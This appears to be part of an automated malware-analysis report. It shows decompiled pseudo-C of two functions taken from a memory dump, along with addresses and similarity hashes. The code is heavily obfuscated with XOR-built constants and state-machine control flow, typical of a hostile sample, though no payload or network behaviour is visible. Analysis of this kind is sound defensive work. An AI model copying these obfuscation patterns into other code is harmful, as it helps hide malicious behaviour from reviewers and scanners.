                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                    			E00A71E11() {
                                                                                                                                                                                                                    				intOrPtr _v4;
                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                    				signed int _v80;
                                                                                                                                                                                                                    				void* _t135;
                                                                                                                                                                                                                    				signed int _t140;
                                                                                                                                                                                                                    				signed int _t141;
                                                                                                                                                                                                                    				intOrPtr _t142;
                                                                                                                                                                                                                    				void* _t143;
                                                                                                                                                                                                                    				void* _t160;
                                                                                                                                                                                                                    				signed int _t167;
                                                                                                                                                                                                                    				signed int _t168;
                                                                                                                                                                                                                    				intOrPtr* _t170;
                                                                                                                                                                                                                    				signed int _t171;
                                                                                                                                                                                                                    				signed int* _t172;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t172 =  &_v80;
                                                                                                                                                                                                                    				_v16 = 0xffe5e1;
                                                                                                                                                                                                                    				_v12 = 0xa9a9a;
                                                                                                                                                                                                                    				_t143 = 0x2c191d;
                                                                                                                                                                                                                    				_v8 = 0x5be493;
                                                                                                                                                                                                                    				_t142 = 0;
                                                                                                                                                                                                                    				_v4 = 0;
                                                                                                                                                                                                                    				_v32 = 0xf52712;
                                                                                                                                                                                                                    				_v32 = _v32 + 0xffff2644;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x00f54d56;
                                                                                                                                                                                                                    				_v40 = 0xdd85fa;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0xeedfe2d2;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0xee0d6717;
                                                                                                                                                                                                                    				_v80 = 0x6944d7;
                                                                                                                                                                                                                    				_v80 = _v80 + 0xffffa0c1;
                                                                                                                                                                                                                    				_v80 = _v80 + 0xe2ca;
                                                                                                                                                                                                                    				_v80 = _v80 ^ 0x1ad025fc;
                                                                                                                                                                                                                    				_v80 = _v80 ^ 0x1ab95199;
                                                                                                                                                                                                                    				_v44 = 0x6bf945;
                                                                                                                                                                                                                    				_v44 = _v44 >> 1;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x0034b20d;
                                                                                                                                                                                                                    				_v48 = 0x8fb730;
                                                                                                                                                                                                                    				_v48 = _v48 | 0xb2daeadf;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0xb2d82370;
                                                                                                                                                                                                                    				_v64 = 0x23d8e2;
                                                                                                                                                                                                                    				_v64 = _v64 + 0x670f;
                                                                                                                                                                                                                    				_v64 = _v64 + 0xdeca;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x00218701;
                                                                                                                                                                                                                    				_v36 = 0xa35e87;
                                                                                                                                                                                                                    				_v36 = _v36 + 0x6cb3;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x00a2b741;
                                                                                                                                                                                                                    				_v24 = 0xfc79c8;
                                                                                                                                                                                                                    				_v24 = _v24 | 0x8c1aa32a;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x8cfc0ca2;
                                                                                                                                                                                                                    				_v68 = 0xf5b7be;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0xb3cac220;
                                                                                                                                                                                                                    				_v68 = _v68 + 0xa801;
                                                                                                                                                                                                                    				_v68 = _v68 + 0xffffb98d;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0xb33db0b9;
                                                                                                                                                                                                                    				_v72 = 0x5546d0;
                                                                                                                                                                                                                    				_v72 = _v72 >> 3;
                                                                                                                                                                                                                    				_v72 = _v72 + 0xffffcec2;
                                                                                                                                                                                                                    				_v72 = _v72 * 0xe;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0x0094a9d2;
                                                                                                                                                                                                                    				_v60 = 0xfe7d64;
                                                                                                                                                                                                                    				_v60 = _v60 << 2;
                                                                                                                                                                                                                    				_v60 = _v60 + 0xffff5af7;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x03f37a29;
                                                                                                                                                                                                                    				_v76 = 0xb69ea7;
                                                                                                                                                                                                                    				_v76 = _v76 | 0x1dceb60d;
                                                                                                                                                                                                                    				_v76 = _v76 >> 8;
                                                                                                                                                                                                                    				_v76 = _v76 | 0x03ea2215;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0x03ff1adb;
                                                                                                                                                                                                                    				_v28 = 0x2e4036;
                                                                                                                                                                                                                    				_t86 =  &_v28; // 0x2e4036
                                                                                                                                                                                                                    				_t167 = 0x75;
                                                                                                                                                                                                                    				_v28 =  *_t86 / _t167;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x00048ca2;
                                                                                                                                                                                                                    				_v52 = 0xbb67bf;
                                                                                                                                                                                                                    				_v52 = _v52 + 0x9bc2;
                                                                                                                                                                                                                    				_v52 = _v52 | 0xccf635b2;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0xccff6a05;
                                                                                                                                                                                                                    				_v20 = 0x905472;
                                                                                                                                                                                                                    				_v20 = _v20 + 0xf6a9;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x00926c1b;
                                                                                                                                                                                                                    				_t166 = _v20;
                                                                                                                                                                                                                    				_t168 = _v20;
                                                                                                                                                                                                                    				_t171 = _v20;
                                                                                                                                                                                                                    				_v56 = 0x1c63c8;
                                                                                                                                                                                                                    				_v56 = _v56 + 0xffff6568;
                                                                                                                                                                                                                    				_v56 = _v56 << 8;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x1bcf9539;
                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                    					_t160 = 0x5c;
                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                    						L2:
                                                                                                                                                                                                                    						_t135 = 0x154168f;
                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                    							L3:
                                                                                                                                                                                                                    							while(_t143 != 0x2c191d) {
                                                                                                                                                                                                                    								if(_t143 == 0xad83bd) {
                                                                                                                                                                                                                    									E00A7286C(_v52, _t166, _v20, _v56);
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t143 == _t135) {
                                                                                                                                                                                                                    										E00A7D55D(_v24, _v68, _v72, _t171);
                                                                                                                                                                                                                    										_t142 =  !=  ? 1 : _t142;
                                                                                                                                                                                                                    										_t143 = 0xa73da79;
                                                                                                                                                                                                                    										goto L1;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										if(_t143 == 0xa73da79) {
                                                                                                                                                                                                                    											E00A7286C(_v60, _t171, _v76, _v28);
                                                                                                                                                                                                                    											_t143 = 0xad83bd;
                                                                                                                                                                                                                    											while(1) {
                                                                                                                                                                                                                    												L1:
                                                                                                                                                                                                                    												_t160 = 0x5c;
                                                                                                                                                                                                                    												goto L2;
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											if(_t143 == 0xbc7aa6f) {
                                                                                                                                                                                                                    												_t170 =  *0xa83b38 + 0xc;
                                                                                                                                                                                                                    												while( *_t170 != _t160) {
                                                                                                                                                                                                                    													_t170 = _t170 + 2;
                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                    												_t168 = _t170 + 2;
                                                                                                                                                                                                                    												_t143 = 0xf6e61a7;
                                                                                                                                                                                                                    												goto L2;
                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                    												if(_t143 == 0xd698419) {
                                                                                                                                                                                                                    													_t140 = E00A774CF(_v32, _v64, _v36, _t166, _t168);
                                                                                                                                                                                                                    													_t172 =  &(_t172[3]);
                                                                                                                                                                                                                    													_t171 = _t140;
                                                                                                                                                                                                                    													_t135 = 0x154168f;
                                                                                                                                                                                                                    													_t143 =  !=  ? 0x154168f : 0xad83bd;
                                                                                                                                                                                                                    													_t160 = 0x5c;
                                                                                                                                                                                                                    													continue;
                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                    													if(_t143 != 0xf6e61a7) {
                                                                                                                                                                                                                    														goto L20;
                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                    														_t141 = E00A769E0(_v80, _v40, _t143, _v44, _t143, _v48);
                                                                                                                                                                                                                    														_t166 = _t141;
                                                                                                                                                                                                                    														_t172 =  &(_t172[4]);
                                                                                                                                                                                                                    														if(_t141 != 0) {
                                                                                                                                                                                                                    															_t143 = 0xd698419;
                                                                                                                                                                                                                    															while(1) {
                                                                                                                                                                                                                    																L1:
                                                                                                                                                                                                                    																_t160 = 0x5c;
                                                                                                                                                                                                                    																L2:
                                                                                                                                                                                                                    																_t135 = 0x154168f;
                                                                                                                                                                                                                    																goto L3;
                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								L23:
                                                                                                                                                                                                                    								return _t142;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							_t143 = 0xbc7aa6f;
                                                                                                                                                                                                                    							L20:
                                                                                                                                                                                                                    						} while (_t143 != 0xc9c4b76);
                                                                                                                                                                                                                    						goto L23;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    			}


































                                                                                                                                                                                                                    0x00a71e11
                                                                                                                                                                                                                    0x00a71e18
                                                                                                                                                                                                                    0x00a71e22
                                                                                                                                                                                                                    0x00a71e2a
                                                                                                                                                                                                                    0x00a71e2f
                                                                                                                                                                                                                    0x00a71e37
                                                                                                                                                                                                                    0x00a71e39
                                                                                                                                                                                                                    0x00a71e3d
                                                                                                                                                                                                                    0x00a71e45
                                                                                                                                                                                                                    0x00a71e4d
                                                                                                                                                                                                                    0x00a71e55
                                                                                                                                                                                                                    0x00a71e5d
                                                                                                                                                                                                                    0x00a71e65
                                                                                                                                                                                                                    0x00a71e6d
                                                                                                                                                                                                                    0x00a71e75
                                                                                                                                                                                                                    0x00a71e7d
                                                                                                                                                                                                                    0x00a71e85
                                                                                                                                                                                                                    0x00a71e8d
                                                                                                                                                                                                                    0x00a71e95
                                                                                                                                                                                                                    0x00a71e9d
                                                                                                                                                                                                                    0x00a71ea1
                                                                                                                                                                                                                    0x00a71ea9
                                                                                                                                                                                                                    0x00a71eb1
                                                                                                                                                                                                                    0x00a71eb9
                                                                                                                                                                                                                    0x00a71ec1
                                                                                                                                                                                                                    0x00a71ec9
                                                                                                                                                                                                                    0x00a71ed1
                                                                                                                                                                                                                    0x00a71ed9
                                                                                                                                                                                                                    0x00a71ee1
                                                                                                                                                                                                                    0x00a71ee9
                                                                                                                                                                                                                    0x00a71ef1
                                                                                                                                                                                                                    0x00a71ef9
                                                                                                                                                                                                                    0x00a71f01
                                                                                                                                                                                                                    0x00a71f09
                                                                                                                                                                                                                    0x00a71f11
                                                                                                                                                                                                                    0x00a71f19
                                                                                                                                                                                                                    0x00a71f21
                                                                                                                                                                                                                    0x00a71f29
                                                                                                                                                                                                                    0x00a71f31
                                                                                                                                                                                                                    0x00a71f39
                                                                                                                                                                                                                    0x00a71f41
                                                                                                                                                                                                                    0x00a71f46
                                                                                                                                                                                                                    0x00a71f55
                                                                                                                                                                                                                    0x00a71f59
                                                                                                                                                                                                                    0x00a71f61
                                                                                                                                                                                                                    0x00a71f69
                                                                                                                                                                                                                    0x00a71f6e
                                                                                                                                                                                                                    0x00a71f76
                                                                                                                                                                                                                    0x00a71f7e
                                                                                                                                                                                                                    0x00a71f86
                                                                                                                                                                                                                    0x00a71f8e
                                                                                                                                                                                                                    0x00a71f93
                                                                                                                                                                                                                    0x00a71f9b
                                                                                                                                                                                                                    0x00a71fa3
                                                                                                                                                                                                                    0x00a71fab
                                                                                                                                                                                                                    0x00a71faf
                                                                                                                                                                                                                    0x00a71fb2
                                                                                                                                                                                                                    0x00a71fb6
                                                                                                                                                                                                                    0x00a71fbe
                                                                                                                                                                                                                    0x00a71fc6
                                                                                                                                                                                                                    0x00a71fce
                                                                                                                                                                                                                    0x00a71fd6
                                                                                                                                                                                                                    0x00a71fde
                                                                                                                                                                                                                    0x00a71fe6
                                                                                                                                                                                                                    0x00a71fee
                                                                                                                                                                                                                    0x00a71ff6
                                                                                                                                                                                                                    0x00a71ffa
                                                                                                                                                                                                                    0x00a71ffe
                                                                                                                                                                                                                    0x00a72002
                                                                                                                                                                                                                    0x00a7200a
                                                                                                                                                                                                                    0x00a72012
                                                                                                                                                                                                                    0x00a72017
                                                                                                                                                                                                                    0x00a7201f
                                                                                                                                                                                                                    0x00a7201f
                                                                                                                                                                                                                    0x00a72021
                                                                                                                                                                                                                    0x00a72022
                                                                                                                                                                                                                    0x00a72022
                                                                                                                                                                                                                    0x00a72022
                                                                                                                                                                                                                    0x00a72027
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a72027
                                                                                                                                                                                                                    0x00a72039
                                                                                                                                                                                                                    0x00a7214f
                                                                                                                                                                                                                    0x00a7203f
                                                                                                                                                                                                                    0x00a72041
                                                                                                                                                                                                                    0x00a72115
                                                                                                                                                                                                                    0x00a72121
                                                                                                                                                                                                                    0x00a72124
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a72047
                                                                                                                                                                                                                    0x00a7204d
                                                                                                                                                                                                                    0x00a720f7
                                                                                                                                                                                                                    0x00a720fe
                                                                                                                                                                                                                    0x00a7201f
                                                                                                                                                                                                                    0x00a7201f
                                                                                                                                                                                                                    0x00a72021
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a72021
                                                                                                                                                                                                                    0x00a72053
                                                                                                                                                                                                                    0x00a72059
                                                                                                                                                                                                                    0x00a720cf
                                                                                                                                                                                                                    0x00a720d7
                                                                                                                                                                                                                    0x00a720d4
                                                                                                                                                                                                                    0x00a720d4
                                                                                                                                                                                                                    0x00a720dc
                                                                                                                                                                                                                    0x00a720df
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7205b
                                                                                                                                                                                                                    0x00a72061
                                                                                                                                                                                                                    0x00a720a8
                                                                                                                                                                                                                    0x00a720ad
                                                                                                                                                                                                                    0x00a720b0
                                                                                                                                                                                                                    0x00a720b9
                                                                                                                                                                                                                    0x00a720be
                                                                                                                                                                                                                    0x00a720c3
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a72063
                                                                                                                                                                                                                    0x00a72069
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7206f
                                                                                                                                                                                                                    0x00a72081
                                                                                                                                                                                                                    0x00a72086
                                                                                                                                                                                                                    0x00a72088
                                                                                                                                                                                                                    0x00a7208d
                                                                                                                                                                                                                    0x00a72093
                                                                                                                                                                                                                    0x00a7201f
                                                                                                                                                                                                                    0x00a7201f
                                                                                                                                                                                                                    0x00a72021
                                                                                                                                                                                                                    0x00a72022
                                                                                                                                                                                                                    0x00a72022
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a72022
                                                                                                                                                                                                                    0x00a7201f
                                                                                                                                                                                                                    0x00a7208d
                                                                                                                                                                                                                    0x00a72069
                                                                                                                                                                                                                    0x00a72061
                                                                                                                                                                                                                    0x00a72059
                                                                                                                                                                                                                    0x00a7204d
                                                                                                                                                                                                                    0x00a72041
                                                                                                                                                                                                                    0x00a72159
                                                                                                                                                                                                                    0x00a7215f
                                                                                                                                                                                                                    0x00a7215f
                                                                                                                                                                                                                    0x00a7212e
                                                                                                                                                                                                                    0x00a72133
                                                                                                                                                                                                                    0x00a72133
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7213f
                                                                                                                                                                                                                    0x00a72022

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 6@.
                                                                                                                                                                                                                    • API String ID: 0-4077388538
                                                                                                                                                                                                                    • Opcode ID: 12e683c96b7365d498e2921241da5e7e777c4d3c9025ed62e7780a9d55f33eb3
                                                                                                                                                                                                                    • Instruction ID: 4f80b0c4666c3c0762dd19f808fc50ba1caf68d582220e9e72e4a4451f4a6eb5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12e683c96b7365d498e2921241da5e7e777c4d3c9025ed62e7780a9d55f33eb3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F7175B11083418FC368CF25D89941BBBF1FFD5358F608A2DF69A56220D7B28A49CF46
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                                                                                    			E00A6B0AC(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                                                                                    				char _v4;
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				unsigned int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				void* _t115;
                                                                                                                                                                                                                    				intOrPtr _t129;
                                                                                                                                                                                                                    				void* _t133;
                                                                                                                                                                                                                    				void* _t135;
                                                                                                                                                                                                                    				signed int _t151;
                                                                                                                                                                                                                    				signed int _t152;
                                                                                                                                                                                                                    				void* _t154;
                                                                                                                                                                                                                    				signed int* _t158;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a20);
                                                                                                                                                                                                                    				_t133 = __edx;
                                                                                                                                                                                                                    				_push(_a16);
                                                                                                                                                                                                                    				_push(1);
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(1);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t115);
                                                                                                                                                                                                                    				_v48 = 0x68da61;
                                                                                                                                                                                                                    				_t158 =  &(( &_v52)[7]);
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0xf0baf272;
                                                                                                                                                                                                                    				_v48 = _v48 << 1;
                                                                                                                                                                                                                    				_t154 = 0;
                                                                                                                                                                                                                    				_v48 = _v48 >> 5;
                                                                                                                                                                                                                    				_t135 = 0x930c113;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x07006540;
                                                                                                                                                                                                                    				_v44 = 0xd0d2fc;
                                                                                                                                                                                                                    				_v44 = _v44 | 0xd3b495fb;
                                                                                                                                                                                                                    				_v44 = _v44 + 0xffffea08;
                                                                                                                                                                                                                    				_v44 = _v44 >> 0x10;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x000c5d04;
                                                                                                                                                                                                                    				_v28 = 0xd96b85;
                                                                                                                                                                                                                    				_v28 = _v28 >> 7;
                                                                                                                                                                                                                    				_t151 = 0xa;
                                                                                                                                                                                                                    				_v28 = _v28 / _t151;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x0004429e;
                                                                                                                                                                                                                    				_v8 = 0x4d74b3;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x7a9a61a6;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x7adb4cd6;
                                                                                                                                                                                                                    				_v52 = 0xbcb2ae;
                                                                                                                                                                                                                    				_t152 = 0x1a;
                                                                                                                                                                                                                    				_v52 = _v52 * 0x14;
                                                                                                                                                                                                                    				_v52 = _v52 + 0x85ef;
                                                                                                                                                                                                                    				_v52 = _v52 << 0xf;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x3dc50f16;
                                                                                                                                                                                                                    				_v12 = 0xa2d001;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x81b9f7c2;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x811f376c;
                                                                                                                                                                                                                    				_v16 = 0x43cbfe;
                                                                                                                                                                                                                    				_v16 = _v16 * 0x43;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x11bf326a;
                                                                                                                                                                                                                    				_v32 = 0xce22d7;
                                                                                                                                                                                                                    				_v32 = _v32 + 0x9021;
                                                                                                                                                                                                                    				_v32 = _v32 + 0xffffae1d;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x00c8d1d9;
                                                                                                                                                                                                                    				_v20 = 0x8fe113;
                                                                                                                                                                                                                    				_v20 = _v20 + 0xffff6f59;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x0084b251;
                                                                                                                                                                                                                    				_v24 = 0xba10b0;
                                                                                                                                                                                                                    				_v24 = _v24 | 0x926cd466;
                                                                                                                                                                                                                    				_v24 = _v24 * 0x11;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0xc2eeaaf1;
                                                                                                                                                                                                                    				_v36 = 0x6cf7ca;
                                                                                                                                                                                                                    				_v36 = _v36 + 0xdc29;
                                                                                                                                                                                                                    				_v36 = _v36 | 0xa5eb0e7e;
                                                                                                                                                                                                                    				_v36 = _v36 * 0x45;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0xb9abc86f;
                                                                                                                                                                                                                    				_v40 = 0x902101;
                                                                                                                                                                                                                    				_v40 = _v40 * 0x1a;
                                                                                                                                                                                                                    				_v40 = _v40 / _t152;
                                                                                                                                                                                                                    				_v40 = _v40 | 0xd52f7209;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0xd5b5c2ac;
                                                                                                                                                                                                                    				_t153 = _v4;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(_t135 != 0x2b47703) {
                                                                                                                                                                                                                    						if(_t135 == 0x5017999) {
                                                                                                                                                                                                                    							_t129 = E00A7C7A8(_t135);
                                                                                                                                                                                                                    							_t153 = _t129;
                                                                                                                                                                                                                    							if(_t129 != 0xffffffff) {
                                                                                                                                                                                                                    								_t135 = 0x2b47703;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t135 == 0x930c113) {
                                                                                                                                                                                                                    								_t135 = 0x5017999;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t135 == 0xbe443fc) {
                                                                                                                                                                                                                    									E00A73546(_a8, 1, _v8, _v52, _t133, _t135, 1, _v12, _v16, _v32, _v4, _v20);
                                                                                                                                                                                                                    									_t158 =  &(_t158[0xa]);
                                                                                                                                                                                                                    									_t135 = 0xeab1590;
                                                                                                                                                                                                                    									_t154 =  !=  ? 1 : _t154;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t135 != 0xeab1590) {
                                                                                                                                                                                                                    										goto L15;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										E00A6E2BD(_v4, _v24, _v36, _v40);
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						L7:
                                                                                                                                                                                                                    						return _t154;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(E00A6D86F(_v44, _v28,  &_v4, _t153) == 0) {
                                                                                                                                                                                                                    						_t135 = 0x6091a0a;
                                                                                                                                                                                                                    						goto L15;
                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                    						_t135 = 0xbe443fc;
                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                                                    					L15:
                                                                                                                                                                                                                    				} while (_t135 != 0x6091a0a);
                                                                                                                                                                                                                    				goto L7;
                                                                                                                                                                                                                    			}
























                                                                                                                                                                                                                    0x00a6b0b3
                                                                                                                                                                                                                    0x00a6b0b9
                                                                                                                                                                                                                    0x00a6b0bb
                                                                                                                                                                                                                    0x00a6b0c0
                                                                                                                                                                                                                    0x00a6b0c1
                                                                                                                                                                                                                    0x00a6b0c5
                                                                                                                                                                                                                    0x00a6b0c6
                                                                                                                                                                                                                    0x00a6b0c7
                                                                                                                                                                                                                    0x00a6b0c8
                                                                                                                                                                                                                    0x00a6b0cd
                                                                                                                                                                                                                    0x00a6b0d5
                                                                                                                                                                                                                    0x00a6b0d8
                                                                                                                                                                                                                    0x00a6b0e2
                                                                                                                                                                                                                    0x00a6b0e6
                                                                                                                                                                                                                    0x00a6b0e8
                                                                                                                                                                                                                    0x00a6b0ed
                                                                                                                                                                                                                    0x00a6b0f2
                                                                                                                                                                                                                    0x00a6b0fa
                                                                                                                                                                                                                    0x00a6b102
                                                                                                                                                                                                                    0x00a6b10a
                                                                                                                                                                                                                    0x00a6b112
                                                                                                                                                                                                                    0x00a6b117
                                                                                                                                                                                                                    0x00a6b11f
                                                                                                                                                                                                                    0x00a6b127
                                                                                                                                                                                                                    0x00a6b132
                                                                                                                                                                                                                    0x00a6b137
                                                                                                                                                                                                                    0x00a6b13d
                                                                                                                                                                                                                    0x00a6b145
                                                                                                                                                                                                                    0x00a6b14d
                                                                                                                                                                                                                    0x00a6b155
                                                                                                                                                                                                                    0x00a6b15d
                                                                                                                                                                                                                    0x00a6b16a
                                                                                                                                                                                                                    0x00a6b16b
                                                                                                                                                                                                                    0x00a6b16f
                                                                                                                                                                                                                    0x00a6b177
                                                                                                                                                                                                                    0x00a6b17c
                                                                                                                                                                                                                    0x00a6b184
                                                                                                                                                                                                                    0x00a6b18c
                                                                                                                                                                                                                    0x00a6b194
                                                                                                                                                                                                                    0x00a6b19c
                                                                                                                                                                                                                    0x00a6b1a9
                                                                                                                                                                                                                    0x00a6b1ad
                                                                                                                                                                                                                    0x00a6b1b5
                                                                                                                                                                                                                    0x00a6b1bd
                                                                                                                                                                                                                    0x00a6b1c5
                                                                                                                                                                                                                    0x00a6b1cd
                                                                                                                                                                                                                    0x00a6b1d5
                                                                                                                                                                                                                    0x00a6b1dd
                                                                                                                                                                                                                    0x00a6b1e5
                                                                                                                                                                                                                    0x00a6b1ed
                                                                                                                                                                                                                    0x00a6b1f5
                                                                                                                                                                                                                    0x00a6b202
                                                                                                                                                                                                                    0x00a6b206
                                                                                                                                                                                                                    0x00a6b20e
                                                                                                                                                                                                                    0x00a6b216
                                                                                                                                                                                                                    0x00a6b21e
                                                                                                                                                                                                                    0x00a6b22b
                                                                                                                                                                                                                    0x00a6b22f
                                                                                                                                                                                                                    0x00a6b237
                                                                                                                                                                                                                    0x00a6b244
                                                                                                                                                                                                                    0x00a6b24e
                                                                                                                                                                                                                    0x00a6b252
                                                                                                                                                                                                                    0x00a6b25a
                                                                                                                                                                                                                    0x00a6b262
                                                                                                                                                                                                                    0x00a6b266
                                                                                                                                                                                                                    0x00a6b266
                                                                                                                                                                                                                    0x00a6b278
                                                                                                                                                                                                                    0x00a6b305
                                                                                                                                                                                                                    0x00a6b30a
                                                                                                                                                                                                                    0x00a6b30f
                                                                                                                                                                                                                    0x00a6b311
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6b311
                                                                                                                                                                                                                    0x00a6b27e
                                                                                                                                                                                                                    0x00a6b284
                                                                                                                                                                                                                    0x00a6b2f7
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6b286
                                                                                                                                                                                                                    0x00a6b28c
                                                                                                                                                                                                                    0x00a6b2e0
                                                                                                                                                                                                                    0x00a6b2e5
                                                                                                                                                                                                                    0x00a6b2e8
                                                                                                                                                                                                                    0x00a6b2ef
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6b28e
                                                                                                                                                                                                                    0x00a6b294
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6b29a
                                                                                                                                                                                                                    0x00a6b2aa
                                                                                                                                                                                                                    0x00a6b2b0
                                                                                                                                                                                                                    0x00a6b294
                                                                                                                                                                                                                    0x00a6b28c
                                                                                                                                                                                                                    0x00a6b284
                                                                                                                                                                                                                    0x00a6b2b2
                                                                                                                                                                                                                    0x00a6b2ba
                                                                                                                                                                                                                    0x00a6b2ba
                                                                                                                                                                                                                    0x00a6b332
                                                                                                                                                                                                                    0x00a6b33e
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6b334
                                                                                                                                                                                                                    0x00a6b334
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6b334
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6b343
